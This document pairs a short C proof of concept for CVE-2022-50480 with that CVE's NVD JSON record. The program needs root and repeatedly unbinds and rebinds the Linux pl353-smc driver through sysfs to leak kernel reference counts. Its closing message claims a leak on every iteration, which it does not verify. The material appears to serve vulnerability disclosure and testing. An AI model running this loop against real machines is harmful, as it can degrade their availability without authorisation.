CVE-2022-50480

/* * CVE-2022-50480 PoC - Trigger refcount leak in pl353_smc_probe() * * This PoC demonstrates how to trigger the reference count leak * by repeatedly binding/unbinding the pl353-smc platform device. * * Note: Requires root privileges to access sysfs entries. */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <fcntl.h> #include <string.h> #define PL353_SMC_DRIVER_PATH "/sys/bus/platform/drivers/pl353-smc" #define PL353_SMC_DEVICE_PATH "/sys/bus/platform/drivers/pl353-smc/e0000000.memory-controller" /* Function to bind/unbind the pl353-smc driver to trigger probe() */ static int trigger_probe(void) { char buf[256]; int fd; /* Unbind the device from the driver */ fd = open(PL353_SMC_DEVICE_PATH "/driver/unbind", O_WRONLY); if (fd >= 0) { snprintf(buf, sizeof(buf), "e0000000.memory-controller\n"); write(fd, buf, strlen(buf)); close(fd); } /* Re-bind to trigger probe() again */ fd = open(PL353_SMC_DRIVER_PATH "/bind", O_WRONLY); if (fd >= 0) { snprintf(buf, sizeof(buf), "e0000000.memory-controller\n"); write(fd, buf, strlen(buf)); close(fd); } return 0; } int main(int argc, char *argv[]) { int iterations = 1000; int i; if (argc > 1) { iterations = atoi(argv[1]); } printf("CVE-2022-50480 PoC: Triggering refcount leak in pl353_smc_probe()\n"); printf("Iterations: %d\n", iterations); for (i = 0; i < iterations; i++) { trigger_probe(); usleep(1000); /* 1ms delay */ } printf("Done. Reference count should have leaked %d times.\n", iterations); return 0; }

{"cve": {"id": "CVE-2022-50480", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:44.683", "lastModified": "2026-01-23T20:11:22.140", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmemory: pl353-smc: Fix refcount leak bug in pl353_smc_probe()\n\nThe break of for_each_available_child_of_node() needs a\ncorresponding of_node_put() when the reference 'child' is not\nused anymore. Here we do not need to call of_node_put() in\nfail path as '!match' means no break.\n\nWhile the of_platform_device_create() will created a new\nreference by 'child' but it has considered the refcounting."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-Other"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.0", "versionEndExcluding": "5.4.220", "matchCriteriaId": "081549BE-7480-48DC-ADD8-8C4546C7330C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5", "versionEndExcluding": "5.10.150", "matchCriteriaId": "C495821C-2A71-4F09-BED8-6A6EB4C9BA27"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.75", "matchCriteriaId": "6D945F46-F32F-4C09-8400-C3477E22A9FB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "5.19.17", "matchCriteriaId": "19B4C3A4-E5C3-41DC-BB14-BE72858E7D35"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0", "versionEndExcluding": "6.0.3", "matchCriteriaId": "5BCD8201-B847-4442-B894-70D430128DEF"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/44db35ceb94756ba513dcf6b69bf9e949b28469c", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/49605dc25e7fb33bf8b671279d4468531da90f89", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/566b143aa5112a0c2784e20603778518bb799537", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/61b3c876c1cbdb1efd1f52a1f348580e6e14efb6", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/b37f4a711e5d4bf3608ccbc6de82b52e92b441a0", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/fde46754d5483bc398018bbec3c8ef5c55219e67", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}